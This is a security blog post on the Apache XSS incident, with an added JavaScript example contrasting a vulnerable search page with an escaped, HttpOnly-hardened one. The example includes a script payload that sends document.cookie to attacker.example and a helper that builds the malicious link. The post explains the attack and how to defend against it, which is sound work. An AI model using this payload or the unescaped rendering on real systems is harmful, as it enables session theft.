First off, I would like to commend Apache for their detailed, well-written disclosures of security breaches. Some organizations take the secretive route, even within the organization, sometimes going so far as to immediately reimage machines that may have been compromised without performing any forensic analysis of which attacks succeeded and whether any sensitive information was exposed. In the spirit of full disclosure, Apache not only goes through the steps of analyzing exactly what happened, but also shares that analysis with the public.

Many companies, as well as vulnerability researchers, believe that Cross-Site Scripting (XSS) vulnerabilities are all benign: the worst that can possibly happen to your site is an alert window announcing “Georgia is l33t!” However, part of the recent attack on Apache that resulted in root compromises of machines within Apache was the result of exploited XSS vulnerabilities. The incident report reads like something out of The Web Application Hacker’s Handbook. The attack used a bug-tracking web application that was vulnerable to XSS. When a user clicked the link included in a bug report, the XSS payload grabbed the user’s session cookie, and with it the user’s authenticated session. Given that the post was about a potential bug in Apache software, it isn’t hard to imagine why an unsuspecting administrator would click the link.
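To make the cookie-theft chain above concrete, here is an added example (my own illustration, not code from the original post or from Apache’s incident report). It models a bug tracker’s search page that reflects a query parameter into HTML unescaped, the link an attacker would plant in a bug report, and the two fixes that break the chain: context-appropriate output encoding and an HttpOnly session cookie. The host names, the `q` parameter, the `session` cookie name and the payload are all constructed for the example.

```javascript
// Added example, not from the original post or Apache's incident report.
// Host names, parameter names, cookie name and payload are assumptions.

// Constructed attacker payload: when it executes in a victim's browser it
// sends document.cookie to a host the attacker controls.
const PAYLOAD =
  "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>";

// Vulnerable: the search term is interpolated into the page unescaped.
function renderSearchVulnerable(query) {
  return `<h1>Search results for: ${query}</h1>`;
}

// Output encoding for the HTML text-content context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Hardened: same page, but the term is encoded before it reaches the HTML.
function renderSearchHardened(query) {
  return `<h1>Search results for: ${escapeHtml(query)}</h1>`;
}

// The link an attacker embeds in a bug report: the payload rides in the
// query string, so the victim sees an ordinary-looking tracker URL.
function buildAttackerLink(baseUrl, payload) {
  const u = new URL("/search", baseUrl);
  u.searchParams.set("q", payload);
  return u.toString();
}

// What the server does with the request: pull the query back out of the URL
// and render it. Returns the HTML that would reach the victim's browser.
function serve(requestUrl, render) {
  const q = new URL(requestUrl).searchParams.get("q") || "";
  return render(q);
}

// Crude check for whether a response would run script in a browser:
// a literal <script element surviving in the HTML.
function executesScript(html) {
  return /<script\b/i.test(html);
}

// Session cookie attributes. HttpOnly keeps document.cookie from exposing
// the session to script, so the payload above reads nothing even when it
// runs; Secure and SameSite limit where the cookie travels.
function sessionCookieHeader(sessionId, { httpOnly = true } = {}) {
  const attrs = ["Path=/", "Secure", "SameSite=Lax"];
  if (httpOnly) attrs.push("HttpOnly");
  return `session=${encodeURIComponent(sessionId)}; ${attrs.join("; ")}`;
}

// Walk the attack through both versions of the page.
function demo() {
  const link = buildAttackerLink("https://tracker.example", PAYLOAD);
  return {
    link,
    vulnerableExecutes: executesScript(serve(link, renderSearchVulnerable)),
    hardenedExecutes: executesScript(serve(link, renderSearchHardened)),
    hardenedHtml: serve(link, renderSearchHardened),
    cookie: sessionCookieHeader("abc123"),
  };
}

console.log(demo());
```

The two defenses are independent: output encoding stops the payload from running at all, while HttpOnly limits the damage if some other injection point is missed. Neither replaces the other, and HttpOnly does nothing against a payload that simply drives the victim’s browser to make authenticated requests instead of exfiltrating the cookie.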

This incident goes to show that even an organization with a strong security posture can fall victim to XSS attacks. Code review and penetration testing of web applications should be in place to assess the risk of XSS being used to compromise your company’s assets, and XSS vulnerabilities should be taken just as seriously as more hyped web application vulnerabilities.